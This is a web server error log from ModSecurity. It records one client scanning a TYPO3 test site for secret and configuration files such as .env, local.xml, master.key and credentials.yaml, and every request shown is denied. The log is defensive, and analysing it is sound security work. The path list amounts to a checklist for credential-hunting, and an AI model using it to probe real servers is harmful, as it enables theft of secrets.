[Mon Sep 30 03:12:40.598677 2024] [:error] [pid 2293061] [client 45.135.232.70:52010] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "Zvn7CP4plfEpgwUkwScOdAAAAAc"]
[Mon Sep 30 03:12:40.601432 2024] [authz_core:error] [pid 2292831] [client 45.135.232.70:52206] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/appveyor.yml
[Mon Sep 30 03:12:40.603786 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:52092] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Mon Sep 30 03:12:40.611308 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:52314] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/awstats.conf
[Mon Sep 30 03:12:40.620338 2024] [:error] [pid 2293064] [client 45.135.232.70:51972] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/.env"] [unique_id "Zvn7CPlRPa8kw2k9ENXZZAAAAAk"]
[Mon Sep 30 03:12:40.620589 2024] [:error] [pid 2293064] [client 45.135.232.70:51972] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/.env"] [unique_id "Zvn7CPlRPa8kw2k9ENXZZAAAAAk"]
[Mon Sep 30 03:12:40.620744 2024] [:error] [pid 2293064] [client 45.135.232.70:51972] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/.env"] [unique_id "Zvn7CPlRPa8kw2k9ENXZZAAAAAk"]
[Mon Sep 30 03:12:40.640181 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:52522] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/ci
[Mon Sep 30 03:12:40.676858 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:52488] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Mon Sep 30 03:12:40.698164 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:52270] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Mon Sep 30 03:12:40.722166 2024] [:error] [pid 2293049] [client 45.135.232.70:52512] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/ci/config/.env"] [unique_id "Zvn7CESJuE_IczKl7y4uhwAAAAY"]
[Mon Sep 30 03:12:40.722444 2024] [:error] [pid 2293049] [client 45.135.232.70:52512] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/ci/config/.env"] [unique_id "Zvn7CESJuE_IczKl7y4uhwAAAAY"]
[Mon Sep 30 03:12:40.722636 2024] [:error] [pid 2293049] [client 45.135.232.70:52512] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/ci/config/.env"] [unique_id "Zvn7CESJuE_IczKl7y4uhwAAAAY"]
[Mon Sep 30 03:12:40.776141 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:52230] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Mon Sep 30 03:12:40.825846 2024] [:error] [pid 2293049] [client 45.135.232.70:52376] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Zvn7CESJuE_IczKl7y4uiAAAAAY"]
[Mon Sep 30 03:12:40.829047 2024] [:error] [pid 2293049] [client 45.135.232.70:52376] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Zvn7CESJuE_IczKl7y4uiAAAAAY"]
[Mon Sep 30 03:12:40.829456 2024] [:error] [pid 2293049] [client 45.135.232.70:52376] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Zvn7CESJuE_IczKl7y4uiAAAAAY"]
[Mon Sep 30 03:12:40.840182 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:52438] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/behat.yml
[Mon Sep 30 03:12:40.860358 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:52482] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/buildspec.yml
[Mon Sep 30 03:12:40.861823 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:52552] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/circleci
[Mon Sep 30 03:12:40.883431 2024] [:error] [pid 2293064] [client 45.135.232.70:52130] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml.additional"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml.additional"] [unique_id "Zvn7CPlRPa8kw2k9ENXZZgAAAAk"]
[Mon Sep 30 03:12:40.883679 2024] [:error] [pid 2293064] [client 45.135.232.70:52130] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml.additional"] [unique_id "Zvn7CPlRPa8kw2k9ENXZZgAAAAk"]
[Mon Sep 30 03:12:40.883957 2024] [:error] [pid 2293064] [client 45.135.232.70:52130] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml.additional"] [unique_id "Zvn7CPlRPa8kw2k9ENXZZgAAAAk"]
[Mon Sep 30 03:12:40.890978 2024] [:error] [pid 2292831] [client 45.135.232.70:52006] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/user/secrets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/user/secrets/.env"] [unique_id "Zvn7CKb0PnYyMP2Lu2ExwgAAAAQ"]
[Mon Sep 30 03:12:40.891208 2024] [:error] [pid 2292831] [client 45.135.232.70:52006] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/user/secrets/.env"] [unique_id "Zvn7CKb0PnYyMP2Lu2ExwgAAAAQ"]
[Mon Sep 30 03:12:40.891349 2024] [:error] [pid 2292831] [client 45.135.232.70:52006] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/v2/user/secrets/.env"] [unique_id "Zvn7CKb0PnYyMP2Lu2ExwgAAAAQ"]
[Mon Sep 30 03:12:40.895201 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:52040] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Mon Sep 30 03:12:40.899384 2024] [:error] [pid 2292827] [client 45.135.232.70:52118] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Zvn7CKppUB6RwzyOV3GHpAAAAAA"]
[Mon Sep 30 03:12:40.899603 2024] [:error] [pid 2292827] [client 45.135.232.70:52118] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Zvn7CKppUB6RwzyOV3GHpAAAAAA"]
[Mon Sep 30 03:12:40.899777 2024] [:error] [pid 2292827] [client 45.135.232.70:52118] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "Zvn7CKppUB6RwzyOV3GHpAAAAAA"]
[Mon Sep 30 03:12:40.950998 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:52068] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Mon Sep 30 03:12:40.968786 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:52014] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Mon Sep 30 03:12:40.970267 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:52170] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application
[Mon Sep 30 03:12:41.004687 2024] [:error] [pid 2292831] [client 45.135.232.70:52446] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "Zvn7Cab0PnYyMP2Lu2ExwwAAAAQ"]
[Mon Sep 30 03:12:41.005118 2024] [:error] [pid 2292831] [client 45.135.232.70:52446] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "Zvn7Cab0PnYyMP2Lu2ExwwAAAAQ"]
[Mon Sep 30 03:12:41.005411 2024] [:error] [pid 2292831] [client 45.135.232.70:52446] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/build/.env"] [unique_id "Zvn7Cab0PnYyMP2Lu2ExwwAAAAQ"]
[Mon Sep 30 03:12:41.006865 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:52452] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup
[Mon Sep 30 03:12:41.015198 2024] [authz_core:error] [pid 2293071] [client 45.135.232.70:52284] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws
[Mon Sep 30 03:12:41.020004 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:52016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aplicacao
[Mon Sep 30 03:12:41.066522 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:52334] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/azure-pipelines.yml
[Mon Sep 30 03:12:41.075463 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:52156] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.yml
[Mon Sep 30 03:12:41.083277 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:52102] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/application.ini
[Mon Sep 30 03:12:41.121145 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:52180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/appspec.yaml
[Mon Sep 30 03:12:41.138815 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:52420] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/behat.yml.dist
[Mon Sep 30 03:12:41.185722 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:52618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Mon Sep 30 03:12:41.201252 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:52592] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudexp
[Mon Sep 30 03:12:41.202714 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:52622] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Mon Sep 30 03:12:41.225260 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:52634] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cloudformation
[Mon Sep 30 03:12:41.235924 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:52642] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/cms
[Mon Sep 30 03:12:41.245419 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:52668] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.json
[Mon Sep 30 03:12:41.248334 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:52648] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/codeception.yml
[Mon Sep 30 03:12:41.255778 2024] [authz_core:error] [pid 2293071] [client 45.135.232.70:52670] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/composer.lock
[Mon Sep 30 03:12:41.336934 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:52716] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.properties.bak
[Mon Sep 30 03:12:41.352015 2024] [authz_core:error] [pid 2293071] [client 45.135.232.70:52780] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Mon Sep 30 03:12:41.384641 2024] [:error] [pid 2292831] [client 45.135.232.70:52788] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Zvn7Cab0PnYyMP2Lu2ExxgAAAAQ"]
[Mon Sep 30 03:12:41.384859 2024] [:error] [pid 2292831] [client 45.135.232.70:52788] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Zvn7Cab0PnYyMP2Lu2ExxgAAAAQ"]
[Mon Sep 30 03:12:41.385048 2024] [:error] [pid 2292831] [client 45.135.232.70:52788] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Zvn7Cab0PnYyMP2Lu2ExxgAAAAQ"]
[Mon Sep 30 03:12:41.448911 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:52766] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Mon Sep 30 03:12:41.488132 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:52898] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.510900 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:52900] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.567113 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:52928] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.655727 2024] [authz_core:error] [pid 2293049] [client 45.135.232.70:52988] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.657881 2024] [authz_core:error] [pid 2293063] [client 45.135.232.70:52966] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.659412 2024] [:error] [pid 2292828] [client 45.135.232.70:52956] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/master.key"] [unique_id "Zvn7CW142CaB14yyWJ3d8QAAAAE"]
[Mon Sep 30 03:12:41.659788 2024] [:error] [pid 2292828] [client 45.135.232.70:52956] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/master.key"] [unique_id "Zvn7CW142CaB14yyWJ3d8QAAAAE"]
[Mon Sep 30 03:12:41.659934 2024] [:error] [pid 2292828] [client 45.135.232.70:52956] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/master.key"] [unique_id "Zvn7CW142CaB14yyWJ3d8QAAAAE"]
[Mon Sep 30 03:12:41.680189 2024] [authz_core:error] [pid 2293064] [client 45.135.232.70:53016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.761934 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:53044] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.769126 2024] [authz_core:error] [pid 2293072] [client 45.135.232.70:53084] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Mon Sep 30 03:12:41.790211 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:53122] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configs
[Mon Sep 30 03:12:41.870493 2024] [authz_core:error] [pid 2293076] [client 45.135.232.70:53208] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core
[Mon Sep 30 03:12:41.873032 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:53184] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configs
[Mon Sep 30 03:12:41.889969 2024] [authz_core:error] [pid 2293069] [client 45.135.232.70:53240] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/credentials.yaml
[Mon Sep 30 03:12:41.970996 2024] [authz_core:error] [pid 2293070] [client 45.135.232.70:53430] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
